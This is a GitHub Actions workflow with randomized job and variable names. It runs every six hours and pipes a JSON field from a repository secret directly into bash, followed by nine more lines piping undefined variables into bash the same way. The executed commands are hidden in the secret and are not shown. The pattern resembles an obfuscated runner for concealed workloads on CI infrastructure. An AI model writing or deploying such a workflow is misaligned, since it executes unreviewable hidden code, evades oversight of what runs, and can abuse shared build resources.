name: shizuniao3289
on:
  workflow_dispatch:
  schedule:
    - cron: '43 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shizuniao3289
        env:
          tjk71689: ${{ secrets.tjk71689 }}
        run: |
          echo $tjk71689 | jq -r .rlo7 | /bin/bash
          echo $ytmj350 | jq -r .vygdp8237 | /bin/bash
          echo $mff71 | jq -r .lhkdz08 | /bin/bash
          echo $h6865 | jq -r .hohz72 | /bin/bash
          echo $s25 | jq -r .h18012 | /bin/bash
          echo $kktux14 | jq -r .p27 | /bin/bash
          echo $w75 | jq -r .a01073 | /bin/bash
          echo $zbfh44260 | jq -r .evne650 | /bin/bash
          echo $brcx4391 | jq -r .o10 | /bin/bash
          echo $s82771 | jq -r .nxxdp96316 | /bin/bash

